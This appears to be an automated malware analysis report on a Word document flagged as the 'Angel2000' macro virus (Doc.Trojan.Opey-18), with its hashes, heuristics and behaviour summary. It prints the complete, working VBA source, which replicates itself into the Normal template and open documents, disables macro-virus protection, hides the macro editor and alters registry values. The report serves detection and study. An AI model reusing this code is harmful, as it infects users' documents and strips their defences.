Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aac2723511083206…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 1997-02-12 15:02:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: c984640b84327f815a742bf68edafdd7
SHA-1: 175294e988716e3ba99282b63fb553ea18539721
SHA-256: aac2723511083206aa6341b9312a6fe66601f8cbcd101cdbad3af2372e146148
Risk score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

ClamAV identifies the sample as Doc.Trojan.Opey-18. The OLE container carries legacy WordBasic macro-virus markers, and the extracted VBA project contains auto-executing entry points (AutoExec, AutoOpen) plus subroutines named after Word's built-in commands (FileOpen, FileSave, FileSaveAs, FileClose, FileExit, FileNew, FilePrint, FilePageSetup), each of which calls the clascopy routine before or after showing the expected dialog. clascopy copies the "Angel2000" module between the global template (NormalTemplate) and every open document through the VBE object model (VBComponents.Add and CodeModule.InsertLines), deletes any other macro module it finds with Application.OrganizerDelete, and saves the infected template. The stealth routine switches off Options.VirusProtection and the Normal-template save prompts, hides and locks the "Visual Basic" command bar, deletes the Tools > Macro and Customize... menu entries, disables the Alt+F8 and Alt+F11 shortcuts, sets the document author to "SOFT Group. Copyright(c) 2000", and writes registry values through System.PrivateProfileString (the Internet Explorer start page to www.sti.edu.ph, RegisteredOwner to "Avenging Angel :)", and an Internet Settings zone display name reading "Infected with Angel Virus"). AutoExec quits Word whenever the current month is December, and the empty ToolsMacro, ViewCode and ViewVBCode stubs prevent the user from opening the macro editor to inspect the code.

Heuristics (5)

  • ClamAV: Doc.Trojan.Opey-18 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (severity: critical; rule: OLE_VBA_MACRO_VIRUS_REPLICATION)
    The VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. This sample does both; clascopy carries the replication and stealth sets Options.VirusProtection = False.
    Matched line in script:
    DocOpen.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    AutoOpen runs when the document is opened. This sample also defines AutoExec, which runs when Word starts once the module has been copied into the Normal template.
    Matched line in script:
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers (severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. In this sample the corresponding names (AutoOpen, ToolsMacro, ViewCode, ViewVBCode) do also appear in the extracted VBA source below.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4907 bytes
SHA-256: 80acec549a23d3a42782d621e6b1c1c110eddb34fb44bf94f40a591005ab084f

Extracted script (the preview shows at most the first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Angel2000"


Attribute VB_Name = "Angel20001"
Sub AutoExec()
    On Error Resume Next
    Call clascopy
    If Month(Date) = 12 Then
        Application.Quit
    End If
End Sub
Sub AutoOpen()
    On Error Resume Next
    Call clascopy
End Sub
Sub FileClose()
    On Error Resume Next
    Call clascopy
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub FileExit()
    On Error Resume Next
    Call clascopy
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub FileNew()
    On Error Resume Next
    Dialogs(wdDialogFileNew).Show
    Call clascopy
End Sub
Sub FileOpen()
    On Error Resume Next
    Dialogs(wdDialogFileOpen).Show
    Call clascopy
End Sub
Sub FilePageSetup()
    On Error Resume Next
    Call clascopy
    Dialogs(wdDialogFilePageSetup).Show
End Sub
Sub FilePrint()
    On Error Resume Next
    Call clascopy
    Dialogs(wdDialogFilePrint).Show
End Sub
Sub FileSave()
    On Error Resume Next
    Call clascopy
    ActiveDocument.Save
End Sub
Sub FileSaveAs()
    On Error Resume Next
    Call clascopy
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub clascopy()
    On Error Resume Next
    Call stealth
    NInfected = False
    For A_A = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        modname = NormalTemplate.VBProject.VBComponents(A_A).Name
        If modname = "Angel2000" Then NInfected = True
        If (modname <> "Angel2000") And (modname <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
    Next A_A
    For Each DocOpen In Documents
        DInfected = False
        With DocOpen
            For B_B = DocOpen.VBProject.VBComponents.Count To 1 Step -1
                modname = DocOpen.VBProject.VBComponents(B_B).Name
                If modname = "Angel2000" Then DInfected = True
                If (modname <> "Angel2000") And (modname <> "ThisDocument") And (modname <> "Reference to Normal") Then Application.OrganizerDelete Source:=DocOpen.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
            Next B_B
            If DInfected = False Then
                e = NormalTemplate.VBProject.VBComponents(2).CodeModule.CountOfLines
                vircode = NormalTemplate.VBProject.VBComponents(2).CodeModule.Lines(1, e)
                DocOpen.VBProject.VBComponents.Add(1).Name = "Angel2000"
                DocOpen.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
                'DocOpen.SaveAs FileName:=DocOpen.FullName
            End If
        End With
    Next DocOpen
    If NInfected = False Then
        e = ActiveDocument.VBProject.VBComponents(2).CodeModule.CountOfLines
        vircode = ActiveDocument.VBProject.VBComponents(2).CodeModule.Lines(1, e)
        NormalTemplate.VBProject.VBComponents.Add(1).Name = "Angel2000"
        NormalTemplate.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
        NormalTemplate.Save
    End If
End Sub
Sub stealth()
    On Error Resume Next
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.SavePropertiesPrompt = False
    ActiveDocument.ReadOnlyRecommended = False
    On Error Resume Next
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    CommandBars("Tools").Controls("Macro").Delete
    CommandBars("Tools").Controls("Customize...").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "SOFT Group. Copyright(c) 2000"
        .Execute
    End With
    System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main", _
    "Start Page") = "www.sti.edu.ph"
     System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\WINDOWS\CURRENTVERSION", _
    "RegisteredOwner") = "Avenging Angel :)"
    System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "DisplayName") = _
    "Infected with Angel Virus"
End Sub
Sub ToolsMacro()
End Sub
Sub ViewCode()
    Call ToolsMacro
End Sub
Sub ViewVBCode()
    Call ToolsMacro
End Sub